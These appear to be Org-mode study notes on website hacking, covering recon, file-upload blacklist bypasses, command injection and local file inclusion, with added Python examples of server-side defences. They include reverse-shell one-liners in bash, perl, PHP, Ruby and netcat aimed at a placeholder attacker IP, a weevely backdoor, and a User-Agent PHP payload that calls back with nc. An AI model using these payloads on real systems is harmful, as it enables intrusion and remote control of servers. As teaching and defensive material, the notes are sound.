* Website Hacking
** Gathering Information

We can gather information from a website using a whois lookup:

- [[whois.domaintools.com][whois.domaintools.com]]

We can also discover subdomains:

#+begin_src bash
	knockpy --domain [target_domain] --recon # use a passive information gathering method
	knockpy --domain [target_domain] --bruteforce # use an active information gathering method
#+end_src

We can discover files using dirb:

#+begin_src bash
	dirb [target] [wordlist] [options]
#+end_src

** File Upload Vulnerabilities

File upload vulnerabilities are the simplest type of vulnerability: the
application lets users upload executable files, such as PHP files, which the
web server will then run when they are requested.

We can generate a PHP shell using weevely:

#+begin_src bash
	weevely generate [password] [file_name] # generate backdoor
	weevely [url to file] [password] # connect to backdoor
#+end_src

If the website has some sort of protection against these kinds of files, we can
fire up Burp Suite, rename our shell to ~shell.jpg~ so that the Content-Type is
set to image/jpeg, and then change the filename back in Burp Suite after the
client-side check has passed. If that still doesn't work, we can upload a file
named ~shell.php.jpg~ to see whether the server accepts it. Some examples of
names are:

#+begin_src text
	upload.php         --- try to upload a plain PHP file
	upload.php.jpeg    --- to bypass the blacklist (double extension)
	upload.jpg.php     --- to bypass the blacklist (double extension)
	upload.php         --- then change the Content-Type of the file to image/jpeg
	upload.php*        --- PHP version extensions: php1 php2 php3 php4 php5 php6 php7
	upload.PHP         --- to bypass a case-sensitive blacklist
	upload.PhP         --- to bypass a case-sensitive blacklist
	upload.pHp         --- to bypass a case-sensitive blacklist
#+end_src
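Every name in the list above targets the same weakness: a blacklist that looks at
the client-supplied filename or Content-Type. The following is an added example
(not code from the original notes) of the server-side validation that defeats all
of them at once. It assumes a hypothetical upload handler that only accepts JPEG
and PNG images; the bypass names are taken from the list above and used as
constructed test input.

```python
import os
import re
import secrets

# Allow-list of extensions and the magic bytes each file must begin with.
# Assumption: this hypothetical application only accepts JPEG and PNG images.
ALLOWED_TYPES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}

# Constructed sample: the bypass names from the list above (php* expanded to php3/php5).
BYPASS_NAMES = [
    "upload.php", "upload.php.jpeg", "upload.jpg.php", "upload.php3",
    "upload.php5", "upload.PHP", "upload.PhP", "upload.pHp",
]

# Constructed sample contents: the start of a real JPEG, and a PHP script.
JPEG_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF"
PHP_PAYLOAD = b"<?php echo 'not an image'; ?>"


def validate_upload(filename, content):
    """Return a server-chosen filename to store the upload under, or None to reject.

    The client-supplied Content-Type is deliberately never consulted; the decision
    rests on three checks that together cover every bypass name in the list:
      1. exactly one dot, so double extensions (shell.php.jpg, shell.jpg.php) fail;
      2. the extension, compared case-insensitively, must be in the allow-list,
         so .PHP/.PhP/.php3 fail;
      3. the content must start with the magic bytes of the claimed type, so a
         PHP script renamed to .jpg fails.
    """
    base = os.path.basename(filename)          # drop any directory components
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:         # require "name.ext" exactly
        return None
    ext = parts[1]
    if ext not in ALLOWED_TYPES:                # allow-list, not blacklist
        return None
    if not content.startswith(ALLOWED_TYPES[ext]):
        return None
    # Never reuse the original name on disk: random token plus validated extension.
    return f"{secrets.token_hex(16)}.{ext}"


def names_that_slip_through(names=BYPASS_NAMES, content=JPEG_HEADER):
    """Return the subset of names the validator would accept; should be empty."""
    return [n for n in names if validate_upload(n, content) is not None]


if __name__ == "__main__":
    print("bypass names accepted:", names_that_slip_through())
    print("photo.jpg with JPEG bytes ->", validate_upload("photo.jpg", JPEG_HEADER))
    print("photo.jpg with PHP bytes  ->", validate_upload("photo.jpg", PHP_PAYLOAD))
```

The stored name is generated server-side, so even if a later check is added or
removed, the attacker never controls the path the web server serves the file from.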

** Code Execution Vulnerabilities

These vulnerabilities allow an attacker to execute OS commands, whether Windows
or Linux commands, on the web server. They can be used to get a reverse shell, or
to upload any file using the ~wget~ command.

To test for it, we can append ~;~ followed by a harmless command such as ~pwd~
to the input and check whether its output appears in the response. If ~;~
doesn't work, we can try ~|~ instead.

Some commands we can execute to get a reverse shell are:

#+begin_src bash
  bash -i >& /dev/tcp/[ip_address]/8080 0>&1
#+end_src

#+begin_src perl
  perl -e 'use Socket;$i="[ip_address]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
#+end_src

#+begin_src php
  php -r '$sock=fsockopen("[ip_address]",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
#+end_src

#+begin_src ruby
  ruby -rsocket -e'f=TCPSocket.open("[ip_address]",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
#+end_src

#+begin_src bash
	nc -e /bin/sh [ip_address] 8080
#+end_src

To catch the shell with netcat, we need a listener on our machine:

#+begin_src bash
  nc -vv -l -p 8080
#+end_src
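The reason ~;~ and ~|~ work is that the application hands a string built from
user input to a shell, which treats those characters as command separators. The
following added example (not from the original notes) shows, in Python, how a
hypothetical "ping this host" handler becomes injectable, how a shell tokenizer
sees the probes from the text, and the two-part fix: validate the input against
a strict pattern and pass the command as an argument list so no shell parses
it. ~echo~ stands in for the real tool so the example runs offline; the host
values are constructed.

```python
import re
import shlex
import subprocess

# Constructed inputs: one legitimate value and the two probes described above.
LEGIT_HOST = "example.com"
PROBE_SEMICOLON = "example.com; pwd"
PROBE_PIPE = "example.com | id"

# Strict allow-list pattern for a hostname (assumption: only DNS names are valid input).
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")


def vulnerable_command(host):
    """Build the command string the way a vulnerable handler does.

    Returned as a string only; it is never executed here. A handler that passed
    this to os.system() or subprocess with shell=True would run anything after
    ';' or '|' as a separate command.
    """
    return "ping -c 1 " + host


def commands_shell_would_run(cmd):
    """Count how many separate commands a POSIX shell sees in cmd.

    shlex with punctuation_chars=True splits ';', '|', '&&' etc. into their own
    tokens, which is exactly the parsing step that turns one command into two.
    """
    tokens = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    separators = {";", "|", "||", "&&", "&"}
    return 1 + sum(1 for tok in tokens if tok in separators)


def argv_form(host):
    """Run the command as an argument list: the whole value is a single argv entry.

    Even without validation the shell never sees it, so ';' and '|' are literal.
    'echo' substitutes for the real tool so this runs offline.
    """
    result = subprocess.run(["echo", host], capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")


def safe_lookup(host):
    """The hardened handler: reject anything that is not a hostname, then use argv."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected input: {host!r}")
    return argv_form(host)


if __name__ == "__main__":
    for value in (LEGIT_HOST, PROBE_SEMICOLON, PROBE_PIPE):
        cmd = vulnerable_command(value)
        print(f"{cmd!r}: shell would run {commands_shell_would_run(cmd)} command(s)")
    print("argv form keeps the probe literal:", argv_form(PROBE_SEMICOLON))
    try:
        safe_lookup(PROBE_SEMICOLON)
    except ValueError as exc:
        print("safe_lookup:", exc)
```

Input validation alone is brittle (a new separator or an encoding the pattern
missed gets through), and the argv form alone still lets an attacker pick
arbitrary flags; together they cover each other's gaps.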

** Local File Inclusion Vulnerabilities

Local file inclusion allows an attacker to read any file the web server process
can read, including files outside the www directory. We can get ~/etc/passwd~,
for example.

We can also gain a reverse shell from this vulnerability by injecting code into
a readable file that the server then includes. ~/proc/self/environ~ holds the
environment of the process serving the request, which includes the
~HTTP_USER_AGENT~ variable sent by the client. With Burp Suite we can set the
User-Agent header to PHP code, and including ~/proc/self/environ~ executes it.
For example:

#+begin_src php
  passthru("nc -e /bin/sh [ip_address] [port]");
#+end_src
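Both the ~/etc/passwd~ read and the ~/proc/self/environ~ trick rely on the
application joining a user-supplied value onto an include path with no check
that the result stays inside the intended directory. The following added example
(not from the original notes) shows that check in Python for a hypothetical
page-include parameter: decode once, reject null bytes and absolute paths,
normalise, and confirm the result is still under the pages directory; a stricter
allow-list variant is shown alongside it. The base directory and inputs are
constructed.

```python
import os
import urllib.parse

# Assumption: the hypothetical application includes templates from this directory.
PAGES_DIR = "/var/www/html/pages"

# Allow-list variant: the only pages the application actually has (constructed).
KNOWN_PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}


def resolve_include(page, base=PAGES_DIR):
    """Return the absolute path to include, or None if the request must be refused.

    Decoding happens exactly once: the web server has usually already decoded
    the query string, and decoding twice would turn %252e%252e into '..'.
    os.path.normpath collapses '../' segments as a string operation, so the
    containment check below does not touch the filesystem; in production add
    os.path.realpath to the candidate as well, so symlinks cannot escape base.
    """
    decoded = urllib.parse.unquote(page)
    if "\x00" in decoded:                     # null byte: truncates paths in some runtimes
        return None
    if os.path.isabs(decoded):                 # "/etc/passwd", "/proc/self/environ"
        return None
    base = os.path.normpath(base)
    candidate = os.path.normpath(os.path.join(base, decoded))
    if os.path.commonpath([base, candidate]) != base:
        return None                            # "../../etc/passwd" lands outside base
    return candidate


def resolve_include_allowlist(page, base=PAGES_DIR):
    """Stricter variant: map a page *name* to a file; nothing from the request
    reaches the filesystem path at all."""
    filename = KNOWN_PAGES.get(page)
    return None if filename is None else os.path.join(base, filename)


if __name__ == "__main__":
    # Constructed requests: legitimate ones and the LFI probes from the text.
    for req in ("about", "sub/page", "sub/../about",
                "../../../etc/passwd", "/etc/passwd", "/proc/self/environ",
                "%2e%2e/%2e%2e/%2e%2e/etc/passwd", "about%00.php"):
        print(f"{req!r:40} -> {resolve_include(req)}")
    print("allow-list:", resolve_include_allowlist("about"),
          resolve_include_allowlist("../etc/passwd"))
```

The containment check is the general fix when file names must come from the
request; the allow-list is preferable whenever the set of includable pages is
known in advance, because it also removes the /proc/self/environ path entirely.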

** Remote File Inclusion Vulnerabilities
